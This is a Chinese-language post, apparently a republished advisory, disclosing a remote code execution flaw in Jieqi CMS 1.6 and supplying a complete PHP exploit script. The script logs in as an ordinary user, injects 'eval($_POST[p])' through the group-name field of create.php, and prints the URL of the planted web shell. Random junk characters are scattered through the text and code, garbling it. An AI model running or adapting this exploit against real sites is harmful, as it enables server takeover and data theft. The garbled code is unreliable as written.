杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。3 f8 j- h! A. r; }8 q
) D9 S4 o1 ^9 \ J9 U- f; g4 s ' a, u; P6 i: ?- P+ D$ j
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
3 m) A# @6 v2 \4 @% M8 l' `2 z* P 需要有一个能创建圈子的用户。' o0 T) W; X8 {
* \ b( H+ |5 A, N; I8 b<?php! @- W$ l+ V. r- T7 I
0 p: `' z1 |% N8 s5 J4 k
print_r('
' X' }8 D4 R7 e: }0 e6 H+---------------------------------------------------------------------------+8 w9 A, p* Q# F+ `5 n, }
Jieqi CMS V1.6 PHP Code Injection Exploit
2 U8 L* {6 y( j& y" sby flyh4t
. M9 o6 }! n) E6 W0 kmail: phpsec at hotmail dot com# w" P$ U" `7 ~5 q' o, m
team: http://www.wolvez.org
1 E! e% k! s/ H$ q6 x9 Z+---------------------------------------------------------------------------+: [( C' V! N$ @8 ]4 i
'); /**
- m, o- ]) ]7 W/ S/ K' R4 x. b * works regardless of php.ini settings
* K; x' Z. Z( W4 p+ X+ U*/ if ($argc < 5) { print_r('
- k/ a2 p6 g+ @+---------------------------------------------------------------------------+" h/ _. |: ?3 Y5 u( y
Usage: php '.$argv[0].' host path username
% G% u: n4 a. @6 ^7 p7 whost: target server (ip/hostname)
4 i4 Y6 |6 ^0 V% l1 h) t* [path: path to jieqicms
) W4 |% \& f0 o: h; duasename: a username who can create group
4 G6 k; P6 F1 c; W1 h4 F3 [Example:7 r- O9 `& k# r9 O/ Y
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
0 g/ u9 w$ |- v, v# H+---------------------------------------------------------------------------+3 Z' h# K# z" I y) s2 [/ F" Y
'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
0 Y" h9 x8 F2 g# d3 G( ?# l6 UContent-Disposition: form-data; name="gname"/ O( d+ b: m* n* |: f4 X
}! U1 K( y5 T'; $params .="';"; $params .='eval($_POST[p]);//flyh4t3 c9 p3 b" b+ J) h. {
-----------------------------23281168279961
' Y# M. y% z- s& |3 V0 t$ ~! LContent-Disposition: form-data; name="gcatid"
: Q5 n; Q) N$ Z' p6 {( Z
- S/ O) m6 U# _8 \9 s) p. R* ?2 v+ N1
( }) Y; x' M! I. p# t8 ^-----------------------------23281168279961& W$ X) D2 h& r, v3 D
Content-Disposition: form-data; name="gaudit"& E7 g- y0 I, x6 y, l
1 E. i# X4 E5 C0 P8 w- Z+ Y$ r* K
1% l7 T# V2 G. G, f
-----------------------------232811682799617 k, g) E. k) o# L, w" P) {8 x
Content-Disposition: form-data; name="gbrief". m* |% ]+ A. e% R7 x
5 s; E9 w1 j- E E( z, g1 Z* u" p3 [
10 ?# F: e* e9 z( l- ~
-----------------------------23281168279961--% o9 o# q& i7 x, f" K
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
+ F/ r2 x$ {; m `: G. @
# H) S/ j/ a/ M: e5 Jpreg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |